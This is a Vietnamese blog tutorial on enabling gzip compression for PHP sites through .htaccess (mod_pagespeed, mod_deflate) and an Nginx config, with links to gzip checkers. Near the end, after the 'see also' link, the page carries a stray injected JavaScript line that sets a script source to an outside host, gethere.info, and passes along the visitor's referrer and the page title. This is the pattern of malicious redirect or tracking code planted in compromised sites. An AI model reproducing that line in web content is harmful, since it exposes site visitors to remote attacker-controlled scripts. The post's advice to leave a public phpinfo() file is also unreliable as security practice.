Hướng dẫn tăng tốc website bằng nén gzip mã nguồn php

Bật nén Gzip cho website trên sever là giảm được kích cỡ, thời gian tải website, tiết kiệm được băng thông, tối ưu hóa cho SEO.

Hướng dẫn tăng tốc website bằng nén gzip mã nguồn php

Một website có tốc độ load chậm rất phản cảm với người dùng, thậm chí gây nên ức chế về thời gian chờ đợi duyệt một trang web. Đặc biệt với những trang web chứa nhiều hình ảnh dung lượng lớn thì việc load chúng trên dtdd là một cực hình. Về bản thân mình chả hứng thú gì khi vào một trang web mà nó cứ quay vòng tròn đến tận 10s rồi chưa thấy nội dung đâu.

Thêm một cái nữa cực kỳ có lợi ích nó giúp bạn nén được 80% kích cỡ webite giúp bạn tiết kiệm tiền và chi phí duy trì hoạt động của website. Nói ra đây là một lợi ích rất lớn mà bạn cần quan tâm, đối với những wesbite cỡ lớn hoặc những mã nguồn như WordPress hay VBB thì việc bật nén Gzip trở nên cực kỳ quan trọng. Trước khi tìm ra được chức năng nén Gzip thì hosting của mình luôn trong tình trạng thông báo hết bandwich và luôn luôn phải mua gia tăng băng thông hàng tháng.

Sau đây mình sẽ hướng dẫn các bạn kích hoạt chức năng nén Gzip với những website sử dụng mã nguồn php.

 

Thao tác cơ bản nén Gzip với file .htaccess

Đầu tiên cần kiểm tra xem website của bạn thuộc loại nào bằng cách tạo 1 file có tên info.php trên sever hoặc hosting của bạn:

<? phpinfo(); ?>

Sau đó chạy yourdomain.com/info.php để xem sever có hỗ trợ mod nén Gzip không? Vì nhiều hosting miễn phí cũng như đảm bảo doanh thu của nhà mạng họ đã đóng chức năng này buộc bạn muốn sử dụng thì phải nâng cấp lên một gói sử dụng đắt tiền hơn. Khi đã hỗ trợ thì bạn thực hiện theo những cách sau:
Kích hoạt mod_pagespeeds với sever Apache bằng cách thêm đoạn code sau vào file .htaccess
ModPagespeed on

 ModPagespeed on 
  # using commands,filters etc

Nhưng nếu hosting của bạn không hỗ trợ mod này thì chúng ta sử dụng một module khác là mod_deflate với Apache 2.0 trở lên

				AddOutputFilterByType DEFLATE text/html text/plain text/xml application/xml application/xhtml+xml text/css text/javascript application/javascript application/x-javascript

với máy chủ Nginx các bạn kích hoạt Gzip bằng cách thêm code sau vào file Ngins.conf

server { 
  gzip on; 
  gzip_types text/html text/css application/x-javascript text/plain text/xml image/x-icon; 
}

Sau khi kích hoạt bạn sẽ tiết kiệm được rất nhiều bandwich và giảm thời gian tải trang web.

Sau khi thực hiện nén website mình đã giảm được 86% từ 137kb xuống còn 18kb. Thật tuyệt vời. Bạn thực hiện kiểm tra xem website của mình đã được bật nén Gzip hay chưa. Nếu chưa bạn cần phải tìm ra nguyên nhân từ đâu hoặc sever có hỗ trợ Module nén Gzip hay.

http://checkgzipcompression.com/

http://www.whatsmyip.org/

http://www.gidnetwork.com/

http://www.dnsqueries.com/

Blog của mình sau khi nén đã giảm được rất nhiều dung lượng

Hướng dẫn tăng tốc website bằng nén gzip mã nguồn php

Ngoài ra một số hosting trả phí có tích hợp sẵn module nén Gzip trong Cpanel mà bạn không cần phải kích hoạt bằng bất kỳ thao tác nào.

Xem thêm: Bật Gzip cho hosting được tích hợp Module nén trong Cpanel

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Pin It

Trả lời

Thư điện tử của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *